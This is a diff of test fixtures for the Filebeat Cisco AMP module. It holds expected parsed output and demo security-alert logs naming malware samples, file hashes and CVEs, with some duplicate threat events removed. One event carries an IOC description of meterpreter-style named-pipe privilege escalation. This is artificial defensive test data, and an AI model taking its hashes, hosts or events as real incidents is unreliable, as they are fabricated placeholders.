"cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2017-0106", + "CVE-2017-11774", + "CVE-2017-8506", + "CVE-2017-8507", + "CVE-2017-8571", + "CVE-2017-8663", + "CVE-2018-0791" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2017-0106", + "name": "Microsoft Office", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106", + "version": "2016" + }, + { + "cve": "CVE-2017-11774", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774" + }, + { + "cve": "CVE-2017-8506", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506" + }, + { + "cve": "CVE-2017-8507", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507" + }, + { + "cve": "CVE-2017-8571", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571" + }, + { + "cve": "CVE-2017-8663", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663" + }, + { + "cve": "CVE-2018-0791", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193366641599, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T04:32:53.000Z", + "file.hash.sha256": "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc", + "file.name": "OUTLOOK.EXE", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 64342, + "process.hash.sha256": "71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243", + "related.hash": [ + "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:22:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 878000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6525498672153625000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 66455, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:07:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 554696715, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.scan.clean": true, + "cisco.amp.scan.description": "Flash Scan", + "cisco.amp.scan.malicious_detections": 0, + "cisco.amp.scan.scanned_files": 2872, + "cisco.amp.scan.scanned_paths": 0, + "cisco.amp.scan.scanned_processes": 49, + "cisco.amp.timestamp_nanoseconds": 928000000, + "event.action": "Scan Completed, No Detections", + "event.dataset": "cisco.amp", + "event.id": 6525494703603843000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 67379, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:06:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 554696714, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.scan.description": "Flash Scan", + "cisco.amp.timestamp_nanoseconds": 537000000, + "event.action": "Scan Started", + "event.dataset": "cisco.amp", + "event.id": 6525494527510184000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 68455, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log index ed37c533eac..ae6c21d78ff 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log @@ -10,14 +10,6 @@ {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":14000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671380737589000,"timestamp":1610706458,"timestamp_nanoseconds":605000000,"date":"2021-01-15T10:27:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":81000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551547","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":60000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551546","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671118744584000,"timestamp":1610706397,"timestamp_nanoseconds":666000000,"date":"2021-01-15T10:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671118744584249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546488","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":274000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670856751579000,"timestamp":1610706336,"timestamp_nanoseconds":880000000,"date":"2021-01-15T10:25:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670856751579190","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} @@ -46,917 +38,5 @@ {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} 